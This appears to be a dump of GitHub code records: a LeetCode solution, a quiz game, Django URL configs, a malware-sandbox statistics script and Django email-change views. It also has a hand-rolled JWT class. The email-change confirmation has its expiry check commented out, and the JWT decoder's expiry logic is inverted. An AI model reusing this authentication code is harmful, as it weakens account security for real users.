"rest_framework.response.Response", "line_number": 73, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 61, "usage_type": "call"}]} +{"seq_id": "38788309294", "text": "\"\"\"\nmy blog: https://www.cnblogs.com/marvintang1001/p/11177021.html\n\n\"\"\"\n\nfrom collections import Counter\n\nclass Solution:\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n counter = Counter(nums).most_common() # 按出现次数从大到小排列\n alist = []\n for i in range(k):\n alist.append(counter[i][0]) # 返回的是一个元组:【0】是字符串,【1】是出现次数\n return alist\n\n", "repo_name": "Marvintang1001/my_leetcode", "sub_path": "python/347.py", "file_name": "347.py", "file_ext": "py", "file_size_in_byte": 463, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "collections.Counter", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "23603732787", "text": "# coding=utf-8\nfrom django.shortcuts import render, get_object_or_404\nfrom mycompanies.models import Company\nfrom myusers.models import MyUser\nfrom system.models import Transactions\nfrom mycompanies.forms import CompanyForm, LoginChangeForm\nfrom django.template.context_processors import csrf\nfrom django.http import HttpResponseRedirect\nfrom django.template.response import TemplateResponse\nfrom django.core.mail import send_mail\nfrom django.utils.encoding import force_bytes\nfrom django.utils.http import urlsafe_base64_encode\nfrom django.contrib.auth.tokens import default_token_generator\nfrom django.utils.encoding import force_text\nfrom django.utils.http import urlsafe_base64_decode\nfrom django.contrib.auth import (get_user_model)\nfrom django.http import HttpResponse\nimport json\n\nimport datetime\nfrom rest_framework import viewsets\nfrom mycompanies.serializers import CompanyListSerializer\n\n# Create your views here.\n\ndef company_index(request):\n\n if request.user.is_authenticated():\n \n user = request.user\n if user.company_id == None:\n return HttpResponseRedirect(\"/\")\n \n company = get_object_or_404(Company, pk=user.company_id)\n \n if request.method == \"POST\":\n \n form = CompanyForm(request.POST, instance=company)\n if form.is_valid():\n company = form.save(commit=False)\n company.save()\n return HttpResponseRedirect(\"/\")\n else:\n company_form = CompanyForm(instance=company)\n context = {\n 'form': company_form,\n 'email': user.username,\n 'login_change_form': LoginChangeForm()\n }\n context.update(csrf(request))\n \n return render(request, 'company_index.html', context)\n\n else:\n return HttpResponseRedirect(\"/\")\n\ndef login_change(request):\n\n if request.user.is_authenticated():\n user = request.user;\n if request.method == \"POST\":\n form = LoginChangeForm(request.POST)\n if form.is_valid():\n email = request.POST['email'].strip()\n if email == user.username:\n response_data = {}\n response_data['result'] = 'fasle'\n response_data['msg'] = 'Please enter another e-mail'\n return HttpResponse(\n json.dumps(response_data),\n content_type=\"application/json\"\n )\n else: \n try:\n emaildb = MyUser.objects.get(email=email)\n except:\n emaildb = False\n if emaildb:\n response_data = {}\n response_data['result'] = 'fasle'\n response_data['msg'] = 'Company with this e-mail already exists. Please enter another e-mail'\n return HttpResponse(\n json.dumps(response_data),\n content_type=\"application/json\"\n )\n email = emaildb\n else:\n uid = urlsafe_base64_encode(force_bytes(user.pk))\n token = default_token_generator.make_token(user)\n transaction_id = uid.decode(\"utf-8\")+'-'+token\n \n send_mail('Change e-mail', 'http://127.0.0.1:8000/mycompanies/login_change/'+transaction_id+'/', 'my.mybookings.myservices@gmail.com',\n [email], fail_silently=False)\n lifetime = datetime.datetime.utcnow() + datetime.timedelta(hours=2)\n try:\n current_transaction = Transactions.objects.get(transaction_id=transaction_id)\n except:\n current_transaction = False\n if current_transaction:\n current_transaction.email = email\n current_transaction.lifetime = lifetime\n current_transaction.save()\n else:\n Transactions.objects.create(transaction_id=transaction_id, email=email, lifetime=lifetime)\n response_data = {}\n response_data['result'] = 'true'\n response_data['msg'] = 'e-mail sent'\n return HttpResponse(\n json.dumps(response_data),\n content_type=\"application/json\"\n )\n context = {\n 'form': form,\n 'email': email,\n }\n return TemplateResponse(request, 'email_change.html', context)\n return HttpResponseRedirect(\"/\")\n else:\n form = LoginChangeForm()\n context = {\n 'form': form,\n 'email': user.username,\n }\n context.update(csrf(request))\n return TemplateResponse(request, 'login_change.html', context)\n \n else:\n return HttpResponseRedirect(\"/\")\n \n\ndef login_change_confirm(request, uidb64=None, token=None,\n template_name='login_change_confirm.html',\n token_generator=default_token_generator,\n post_reset_redirect=None):\n\n if not request.user.is_authenticated():\n return HttpResponseRedirect(\"/\")\n UserModel = get_user_model()\n assert uidb64 is not None and token is not None\n try:\n # urlsafe_base64_decode() decodes to bytestring on Python 3\n uid = force_text(urlsafe_base64_decode(uidb64))\n user = UserModel._default_manager.get(pk=uid)\n except (TypeError, ValueError, OverflowError, UserModel.DoesNotExist):\n user = None\n if user is not None and token_generator.check_token(user, token):\n validlink = True\n transaction_id=uidb64+'-'+token\n try:\n transaction = Transactions.objects.get(transaction_id=transaction_id)\n except:\n transaction = False\n if transaction:\n# if transaction.lifetime > datetime.datetime.utcnow():\n user.username = transaction.email\n user.email = transaction.email\n user.save()\n transaction.delete()\n return HttpResponseRedirect(post_reset_redirect)\n form = None\n else:\n validlink = False\n form = None\n context = {\n 'form': form,\n 'validlink': validlink,\n }\n return TemplateResponse(request, template_name, context)\n\n\nclass CompanyViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows users to be viewed or edited.\n \"\"\"\n queryset = Company.objects.all()\n serializer_class = CompanyListSerializer\n", "repo_name": "mybookinglife/CPA_ver_1.0.2", "sub_path": "mycompanies/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 7206, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.http.HttpResponseRedirect", "line_number": 32, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 34, "usage_type": "call"}, {"api_name": "mycompanies.models.Company", "line_number": 34, "usage_type": "argument"}, {"api_name": "mycompanies.forms.CompanyForm", "line_number": 38, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 42, "usage_type": "call"}, {"api_name": "mycompanies.forms.CompanyForm", "line_number": 44, "usage_type": "call"}, {"api_name": "mycompanies.forms.LoginChangeForm", "line_number": 48, "usage_type": "call"}, {"api_name": "django.template.context_processors.csrf", "line_number": 50, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 52, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 55, "usage_type": "call"}, {"api_name": "mycompanies.forms.LoginChangeForm", "line_number": 62, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 69, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 70, "usage_type": "call"}, {"api_name": "myusers.models.MyUser.objects.get", "line_number": 75, "usage_type": "call"}, {"api_name": "myusers.models.MyUser.objects", "line_number": 75, "usage_type": "attribute"}, {"api_name": "myusers.models.MyUser", "line_number": 75, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 82, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 83, "usage_type": "call"}, {"api_name": "django.utils.http.urlsafe_base64_encode", "line_number": 88, "usage_type": "call"}, {"api_name": "django.utils.encoding.force_bytes", "line_number": 88, "usage_type": "call"}, {"api_name": "django.contrib.auth.tokens.default_token_generator.make_token", "line_number": 89, "usage_type": "call"}, {"api_name": "django.contrib.auth.tokens.default_token_generator", "line_number": 89, "usage_type": "name"}, {"api_name": "django.core.mail.send_mail", "line_number": 92, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 94, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 94, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 94, "usage_type": "call"}, {"api_name": "system.models.Transactions.objects.get", "line_number": 96, "usage_type": "call"}, {"api_name": "system.models.Transactions.objects", "line_number": 96, "usage_type": "attribute"}, {"api_name": "system.models.Transactions", "line_number": 96, "usage_type": "name"}, {"api_name": "system.models.Transactions.objects.create", "line_number": 104, "usage_type": "call"}, {"api_name": "system.models.Transactions.objects", "line_number": 104, "usage_type": "attribute"}, {"api_name": "system.models.Transactions", "line_number": 104, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 108, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 109, "usage_type": "call"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 116, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 117, "usage_type": "call"}, {"api_name": "mycompanies.forms.LoginChangeForm", "line_number": 119, "usage_type": "call"}, {"api_name": "django.template.context_processors.csrf", "line_number": 124, "usage_type": "call"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 125, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 128, "usage_type": "call"}, {"api_name": "django.contrib.auth.tokens.default_token_generator", "line_number": 133, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 137, "usage_type": "call"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 138, "usage_type": "call"}, {"api_name": "django.utils.encoding.force_text", "line_number": 142, "usage_type": "call"}, {"api_name": "django.utils.http.urlsafe_base64_decode", "line_number": 142, "usage_type": "call"}, {"api_name": "system.models.Transactions.objects.get", "line_number": 150, "usage_type": "call"}, {"api_name": "system.models.Transactions.objects", "line_number": 150, "usage_type": "attribute"}, {"api_name": "system.models.Transactions", "line_number": 150, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 159, "usage_type": "call"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 168, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 171, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 171, "usage_type": "name"}, {"api_name": "mycompanies.models.Company.objects.all", "line_number": 175, "usage_type": "call"}, {"api_name": "mycompanies.models.Company.objects", "line_number": 175, "usage_type": "attribute"}, {"api_name": "mycompanies.models.Company", "line_number": 175, "usage_type": "name"}, {"api_name": "mycompanies.serializers.CompanyListSerializer", "line_number": 176, "usage_type": "name"}]} +{"seq_id": "18838728715", "text": "from question_model import Question\nfrom data import question_data\nfrom quiz_brain import QuizBrain\n\nquestion_bank = []\nfor dictionary in question_data:\n our_question = dictionary[\"question\"]\n our_answer = dictionary[\"correct_answer\"]\n question_bank.append(Question(our_question, our_answer))\n\nquiz_brain = QuizBrain(question_bank)\nwhile quiz_brain.still_has_question():\n quiz_brain.next_question()\n print()\nprint(\"You have completed the Quiz\")\nprint(f\"Your final score is: {quiz_brain.score}/{quiz_brain.question_number}\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# from question_model import Question\n# from data import question_data\n# from quiz_brain import QuizBrain\n#\n# question_bank = []\n# for index in range(0, len(question_data) - 1):\n# dicts = question_data[index]\n# text = dicts[\"text\"]\n# answer = dicts[\"answer\"]\n# question_bank.append(Question(text, answer))\n#\n# running = True\n# while running:\n# quiz_brain = QuizBrain(question_bank)\n# if quiz_brain.next_question() == answer:\n# quiz_brain.next_question()\n#\n# else:\n# print(f\"Your score is: {quiz_brain.question_number}/{len(question_bank)}\")\n# running = False\n", "repo_name": "codenamejj/quiz-game-start", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1182, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "data.question_data", "line_number": 6, "usage_type": "name"}, {"api_name": "question_model.Question", "line_number": 9, "usage_type": "call"}, {"api_name": "quiz_brain.QuizBrain", "line_number": 11, "usage_type": "call"}, {"api_name": "quiz_brain.still_has_question", "line_number": 12, "usage_type": "call"}, {"api_name": "quiz_brain.next_question", "line_number": 13, "usage_type": "call"}, {"api_name": "quiz_brain.score", "line_number": 16, "usage_type": "attribute"}, {"api_name": "quiz_brain.question_number", "line_number": 16, "usage_type": "attribute"}]} +{"seq_id": "73683552284", "text": "from django.urls import path\nfrom . import views\nurlpatterns = [\n path('', views.index),\n path('registro', views.registro),\n path('logearse',views.logearse),\n path('panel',views.panel),\n path('logout',views.logout),\n path('colaborador',views.colaborador),\n path('administrador',views.administrador)\n\n]\n", "repo_name": "egrilli/login_registro", "sub_path": "app_lr/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 323, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.urls.path", "line_number": 4, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "1279188761", "text": "import requests\nimport json\nimport secretvars\nimport discord\n\nss = secretvars.secretvars()\nweatherkey = ss.weatherkey\nbase_url = \"https://api.weatherapi.com/v1/forecast.json?key=\"\n\nasync def wthr(ctx):\n words = ctx.message.content\n important_words = words[8:]\n city_name = important_words\n complete_url = base_url + weatherkey + '&q=' + city_name + '&aqi=no'\n print(complete_url)\n response = requests.get(complete_url)\n data = response.json()\n try:\n # store the value of \"main\" \n # key in variable current \n current = data[\"current\"]\n forecast = data['forecast']\n forecastday = forecast['forecastday'][0]['day']\n astro = forecast['forecastday'][0]['astro']\n\n condition = current[\"condition\"]\n\n embed=discord.Embed(title=data[\"location\"][\"name\"]+', '+data[\"location\"][\"region\"]+', '+data[\"location\"][\"country\"]+'\\t')\n\n # Temperature\n embed.add_field(name='Temperature', value=str(current[\"temp_f\"])+'°F', inline=False)\n\n # Humidity\n embed.add_field(name='Humidity', value=str(current['humidity'])+'%', inline=False)\n\n # Feels like\n embed.add_field(name='Feels Like', value=str(current['feelslike_f'])+'°F', inline=False)\n\n # High Temperature\n embed.add_field(name='High', value=str(forecastday['maxtemp_f'])+'°F', inline=True)\n\n # Low Temperature\n embed.add_field(name='Low', value=str(forecastday['mintemp_f'])+'°F', inline=True)\n\n # Chance of Rain\n embed.add_field(name='Chance of Rain', value=str(forecastday['daily_chance_of_rain'])+'%', inline=True)\n \n # Wind Speed\n embed.add_field(name='Wind Speed', value=str(current['wind_mph'])+'mph', inline=True)\n\n # Wind Direction\n embed.add_field(name='Wind Direction', value=current['wind_dir'], inline=True)\n\n # Pressure\n embed.add_field(name='Pressure', value=str(current['pressure_in'])+' in', inline=True)\n \n # UV Index\n embed.add_field(name='UV Index', value=current['uv'], inline=True)\n\n # Sunrise time\n embed.add_field(name='Sunrise', value=astro['sunrise'], inline=True)\n\n #Sunset Time\n embed.add_field(name='Sunset', value=astro['sunset'], inline=True)\n \n # When the weather data was recorded\n embed.set_footer(text='Last updated at '+current['last_updated'])\n\n # Weather condition icon\n embed.set_thumbnail(url='https:'+condition['icon'])\n \n await ctx.send(embed=embed)\n except:\n embed=discord.Embed(title='Error '+str(data['error']['code']),description=data['error']['message'])\n await ctx.send(embed=embed)\n", "repo_name": "shaheriar/BotJarvisDiscord", "sub_path": "weather.py", "file_name": "weather.py", "file_ext": "py", "file_size_in_byte": 2698, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "secretvars.secretvars", "line_number": 6, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 16, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 28, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 74, "usage_type": "call"}]} +{"seq_id": "42410378148", "text": "from django.conf.urls import patterns, include, url\n\n\nurlpatterns = patterns('',\n url(r'^$', 'files.views.index', name='index'),\n \n url(r'^reset/$', 'files.views.reset', name='reset'),\n \n url(r'^capabilities/$', 'files.views.capabilities', name='capabilities'),\n \n url(r'^analyzed/$', 'files.views.analyzed', name='analyzed'),\n \n url(r'^analyze/$', 'files.views.analyze', name='analyze'),\n \n url(r'^transcode/$', 'files.views.transcode', name='transcode'),\n \n url(r'^download/$', 'files.views.download', name='download'),\n)\n", "repo_name": "sueastside/damn-oga", "sub_path": "damn_oga/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 563, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.conf.urls.patterns", "line_number": 4, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 5, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "74532821723", "text": "import base64\r\nimport copy\r\nimport hmac\r\nimport json\r\nimport time\r\n\r\n\r\nclass Jwt:\r\n def __init__(self):\r\n pass\r\n\r\n @staticmethod\r\n def encode(payload, key, exp=300):\r\n \"\"\"\r\n base64.urlsafe_b64encode\r\n :param payload:\r\n :param key:\r\n :param exp:\r\n :return:\r\n \"\"\"\r\n har = {\r\n 'alg': 'HS256',\r\n 'typ': 'JWT'\r\n }\r\n\r\n # separators 第一个参数标识 JSON每个键值之间用什么相连, 第二个标识key和value用什么相连\r\n # sort_key 每次json串按key排序输出\r\n har = json.dumps(har, separators=(',', ':'), sort_keys=True)\r\n b_har = Jwt.b64encode(har.encode())\r\n\r\n payload = copy.deepcopy(payload)\r\n payload['exp'] = int(time.time() + exp)\r\n pld = json.dumps(payload, separators=(',', ':'), sort_keys=True)\r\n b_pld = Jwt.b64encode(pld.encode())\r\n\r\n sign = b_har + b'.' + b_pld\r\n if isinstance(key, str):\r\n key= key.encode()\r\n\r\n h = hmac.new(key, sign, digestmod='SHA256')\r\n data = h.digest()\r\n\r\n b_sign = Jwt.b64encode(data)\r\n\r\n return b_har + b'.' + b_pld + b'.' + b_sign\r\n\r\n @staticmethod\r\n def b64encode(s):\r\n return base64.urlsafe_b64encode(s).replace(b'=', b'')\r\n\r\n @staticmethod\r\n def b64decode(bs):\r\n \"\"\"\r\n 补回原长\r\n :param bs:\r\n :return:\r\n \"\"\"\r\n third = 4 - (len(bs) % 4)\r\n bs += b'=' * third\r\n return base64.urlsafe_b64decode(bs)\r\n\r\n @staticmethod\r\n def decode(token, key):\r\n bs = token.split(b'.')\r\n sign = bs[0] + b'.' + bs[1]\r\n if isinstance(key, str):\r\n key = key.encode()\r\n h = hmac.new(key, sign, digestmod='SHA256')\r\n b_sign = Jwt.b64encode(h.digest())\r\n f = bs[0] + b'.' + bs[1] + b'.' + b_sign\r\n if f != token:\r\n raise JwtSignError('You token is valid')\r\n bss = Jwt.b64decode(bs[1])\r\n bss = json.loads(bss)\r\n if bss['exp'] < int(time.time() + 300):\r\n print(time.time() + 300)\r\n print(bss['exp'])\r\n raise JwtSignError('you token is expired')\r\n return True\r\n\r\n\r\nclass JwtSignError(Exception):\r\n def __init__(self, error_masg):\r\n self.error = error_masg\r\n\r\n def __str__(self):\r\n return '<JwtError error {}>'.format(self.error)\r\n\r\n\r\n", "repo_name": "lr616731587/ToolHelper", "sub_path": "My_JWT.py", "file_name": "My_JWT.py", "file_ext": "py", "file_size_in_byte": 2411, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "json.dumps", "line_number": 28, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 31, "usage_type": "call"}, {"api_name": "time.time", "line_number": 32, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 33, "usage_type": "call"}, {"api_name": "hmac.new", "line_number": 40, "usage_type": "call"}, {"api_name": "base64.urlsafe_b64encode", "line_number": 49, "usage_type": "call"}, {"api_name": "base64.urlsafe_b64decode", "line_number": 60, "usage_type": "call"}, {"api_name": "hmac.new", "line_number": 68, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 74, "usage_type": "call"}, {"api_name": "time.time", "line_number": 75, "usage_type": "call"}, {"api_name": "time.time", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "30148621153", "text": "import os\nimport json\nimport shutil\nimport sys\nimport glob\nimport subprocess\nimport io\nimport tqdm\n\n\"\"\"\nIndicates the year to aggregate data for.\n\"\"\"\nYEARS = [year for year in sys.argv if year.isnumeric()]\n\n\"\"\"\nIndicates samples should be grouped together by malware family.\n\"\"\"\nNORMALIZE = \"--normalize\" in sys.argv\n\n\"\"\"\nApply corrections on thread hijack - proces hollow\n\"\"\"\nCORRECT = \"--correct\" in sys.argv\n\n\"\"\"\nIndicates the family classification should be rebuild.\n\"\"\"\nFORCE_RECLASSIFY = \"--reclassify\" in sys.argv\n\nclass FamilyStatistics:\n def __init__(self, name: str):\n self.name = name\n self.all_samples = set()\n self.included_samples = set()\n self.positive_samples = dict()\n\n def add_and_include(self, sample_hash):\n self.all_samples.add(sample_hash)\n self.included_samples.add(sample_hash)\n\n def is_singleton(self):\n return self.name.startswith(\"SINGLETON:\")\n\n def get_positive_rate(self):\n if len(self.included_samples) == 0:\n return 0\n assert set(self.positive_samples.keys()).issubset(self.included_samples)\n return len(self.positive_samples) / len(self.included_samples)\n\n def get_detected_behaviors(self):\n result = set()\n for sample, behaviors in self.positive_samples.items():\n result.update(behaviors)\n return result\n\n def get_detected_behaviors_hist(self):\n counts = dict()\n for _, behaviors in self.positive_samples.items():\n for b in behaviors:\n counts[b] = counts.get(b, 0) + 1\n return counts\n\n def get_preferred_behavior(self):\n if len(self.positive_samples) == 0:\n return None\n \n hist = self.get_detected_behaviors_hist()\n return sorted(hist.items(), key=lambda x: -x[1])[0][0]\n \n\n def has_positives(self):\n return len(self.positive_samples) > 0\n\n def is_all_same_behavior(self):\n if len(self.positive_samples) < len(self.included_samples):\n return len(self.positive_samples) == 0\n\n expected = None\n for sample, behaviors in self.positive_samples.items():\n if expected is None:\n expected = behaviors\n elif expected != behaviors:\n return False\n\n return True\n\n def __repr__(self):\n return f\"{self.name}\"\n\n# Read individual sample reports and build up map from sample hash to detected behaviors.\nsample_summaries = dict()\nsamples_per_year = {y: set() for y in YEARS}\nexcluded = 0\n\nfor year in YEARS:\n \"\"\"\n Base directory of all reports and log files.\n \"\"\"\n BASE_DIR = f\"reports/{year}\"\n\n \"\"\"\n The glob for all summary files produced by the analyzer.\n \"\"\"\n SUMMARY_PATH = f\"{BASE_DIR}/summaries/*.log\"\n\n \"\"\"\n The directory storing all raw drakvuf logs. This is used to convert drakvuf IDs in a summary.log to sample hashes.\n \"\"\"\n DRAKVUF_PATH = f\"{BASE_DIR}/drakvuf-logs\"\n\n print(SUMMARY_PATH)\n for summary_path in glob.glob(SUMMARY_PATH):\n print(\"Procesing\", summary_path)\n for line in tqdm.tqdm(open(summary_path, \"r\").readlines()):\n entry = json.loads(line)\n path = entry['File']\n checksum = None\n\n if \"Hash\" in entry:\n # If hash is in the entry (old version of analyzer didn't save this), then just use it.\n checksum = entry[\"Hash\"]\n if checksum == \"<unknown>\":\n checksum = None\n\n if checksum is None:\n if path.endswith(\".exe\"):\n # If path is an exe path, this exe's name is the hash itself.\n checksum = path[path.rfind('/')+1:-4]\n else:\n # Otherwise, path is a drakvuf report path, we can find the sample hash in the drakrun.log.\n checksum = None\n drakvuf_id = path[path.rfind('/')+1:]\n path = f\"{DRAKVUF_PATH}/{drakvuf_id}/drakrun.log\"\n\n if not os.path.isfile(path):\n excluded += 1\n sys.stderr.write(f\"[!] Could not find '{path}'.\\n\")\n continue\n\n for x in open(path, \"r\").readlines():\n idx = x.find(\"SHA256: \")\n if idx != -1:\n checksum = x[idx+8:-3]\n break\n\n if checksum is None:\n excluded += 1\n sys.stderr.write(f\"[!] {path} does not contain sample hash.\\n\")\n continue\n\n detected_behaviors = entry[\"DetectedBehaviors\"]\n if CORRECT:\n if \"Process Hollowing\" in detected_behaviors and \"Thread Hijacking\" in detected_behaviors:\n detected_behaviors.remove(\"Thread Hijacking\")\n\n if checksum in sample_summaries:\n sample_summaries[checksum].update(detected_behaviors)\n else:\n sample_summaries[checksum] = set(detected_behaviors)\n\n samples_per_year[year].add(checksum)\n\n\nfor sample in sample_summaries:\n years = []\n for (year, samples) in samples_per_year.items():\n if sample in samples:\n years.append(year)\n if len(years) > 1:\n sys.stderr.write(f\"[!] Sample {sample} appears in multiple years: {years}\\n\")\n\n\nif not NORMALIZE:\n # Construct mapping from behavior to set of samples implementing said behavior.\n total_positives = 0\n behavior_to_samples = dict()\n technique_adoption_counts = dict()\n for sample_hash, behaviors in sample_summaries.items():\n if len(behaviors) > 0:\n total_positives += 1\n\n count = len(behaviors)\n if count > 0:\n technique_adoption_counts[count] = technique_adoption_counts.get(count, 0) + 1\n\n for behavior in behaviors:\n if behavior not in behavior_to_samples:\n behavior_to_samples[behavior] = set()\n behavior_to_samples[behavior].add(sample_hash)\n\n print(\"\")\n print(\"Number of included samples:\", len(sample_summaries))\n print(\"Number of excluded samples:\", excluded)\n print(f\"Positive samples: {total_positives} ({total_positives/len(sample_summaries)*100:.2f}%)\")\n print(\"\")\n print(f\"{'Technique':>30} Nr of samples Frac of positive samples\")\n for b, fs in sorted(behavior_to_samples.items(), key=lambda x: -len(x[1])):\n print(f\"{b:>30}: {len(fs):>13} {len(fs)*100.0/total_positives:>25.2f}%\")\n\n print(\"\")\n print(f\"{'Nr of Techniques':>30} Nr of samples Frac of positive samples\")\n for c, fs in sorted(technique_adoption_counts.items(), key=lambda x: -x[1]):\n print(f\"{c:>30}: {fs:>13} {fs*100.0/total_positives:>25.2f}%\")\n sys.exit(0)\n\n\nfamilies = dict() # name -> family\nhash_to_family = dict() # hash -> family\nunclassified = FamilyStatistics(\"~unclassified~\")\n\n# Check if classification.txt exists, and if not, regenerate using avclass.\nfor year in YEARS:\n \"\"\"\n Base directory of all reports and log files.\n \"\"\"\n BASE_DIR = f\"reports/{year}\"\n \n \"\"\"\n The path to the file containing a mapping from hash to malware family, as produced by AVClass.\n \"\"\"\n CLASSIFICATION_PATH = f\"{BASE_DIR}/samples/classification.txt\"\n\n \"\"\"\n The path to the directory containing metadata files of all malware samples in a set.\n \"\"\"\n METADATA_PATH = f\"{BASE_DIR}/samples/Win32_EXE\"\n \n if not os.path.isfile(CLASSIFICATION_PATH) or os.path.getsize(CLASSIFICATION_PATH) == 0 or FORCE_RECLASSIFY:\n print(f\"{CLASSIFICATION_PATH} does not exist. Regenerating from {METADATA_PATH}...\")\n if not os.path.isdir(METADATA_PATH):\n sys.stderr.write(f\"[!] {METADATA_PATH} does not exist. Aborting...\\n\")\n sys.exit(1)\n\n if len(os.listdir(METADATA_PATH)) == 0:\n sys.stderr.write(f\"[!] {METADATA_PATH} is empty. Aborting...\\n\")\n sys.exit(1)\n\n with open(CLASSIFICATION_PATH, \"w\") as f, open(\"/tmp/classify.tmp\", \"w\") as e:\n result = subprocess.run(\n [\"python3\", \"avclass/avclass/avclass_labeler.py\", \"-vtdir\", METADATA_PATH, \"-hash\", \"sha256\"],\n stdout=f,\n stderr=e\n )\n\n if result.returncode != 0:\n with open(\"/tmp/classify.tmp\", \"r\") as e:\n sys.stderr.write(e.read())\n sys.exit(result.returncode)\n\n # Parse classification file.\n for line in open(CLASSIFICATION_PATH, \"r\").readlines():\n [sample_hash, family] = line.split('\\t')\n family_name = family.strip()\n family = families.get(family_name)\n \n if family is None:\n # Create a new family if it doesn't exist yet.\n family = FamilyStatistics(family_name)\n families[family_name] = family\n\n # Collect all singleton families, since we want to group these together in the end \n # in the family distribution overview.\n if family.is_singleton():\n unclassified.all_samples.add(sample_hash)\n\n family.all_samples.add(sample_hash)\n hash_to_family[sample_hash] = family\n\n\n# Find out which samples were included in each family.\nnot_found = 0\nfor sample_hash, behaviors in sample_summaries.items():\n family = hash_to_family.get(sample_hash)\n if family is None:\n # This is a family that wasn't specified in the classification.txt, assume it's a singleton family.\n not_found += 1\n family = FamilyStatistics(\"SINGLETON:\" + sample_hash)\n family.add_and_include(sample_hash)\n unclassified.add_and_include(sample_hash)\n continue\n\n family.add_and_include(sample_hash)\n if len(behaviors) > 0:\n x = family.positive_samples.get(sample_hash)\n if x is None:\n x = set()\n family.positive_samples[sample_hash] = x\n x.update(behaviors)\n\n# Filter out families with no included samples.\nfamilies = { n: f for (n, f) in families.items() if len(f.included_samples) > 0 }\n\n# Construct mapping from behavior to set of families implementing said behavior.\nbehavior_to_families = dict()\ncounts_at_least_one = 0\ncounts_all_same = 0\nfor _, family in families.items():\n if family.has_positives():\n counts_at_least_one += 1\n if family.is_all_same_behavior():\n counts_all_same += 1\n\n for behavior in family.get_detected_behaviors():\n if behavior not in behavior_to_families:\n behavior_to_families[behavior] = set()\n behavior_to_families[behavior].add(family)\n\nprint(\"\")\nprint(\"Number of included samples:\", len(sample_summaries))\nprint(\"Number of excluded samples:\", excluded)\nprint(\"Number of families:\", len(families))\nprint(\"Number of samples missing in classification:\", not_found)\nprint(f\"All same behavior: {counts_all_same} ({counts_all_same*100.0/len(families):.2f}%)\")\nprint(f\"At least one injection: {counts_at_least_one} ({counts_at_least_one*100.0/len(families):.2f}%)\")\nprint(\"\")\n\nprint(\"Family Distribution:\")\nprint(\"\")\n#\n# top_family_count = 18\n# top_families = dict(sorted(families.items(), key=lambda x: -len(x[1].included_samples))[:top_family_count])\n# top_family_names = sorted(families.keys(), key=lambda x: -len(families[x].included_samples))[:top_family_count]\ntop_family_names = [\n \"virlock\",\n \"dinwod\",\n \"sivis\",\n \"berbew\",\n 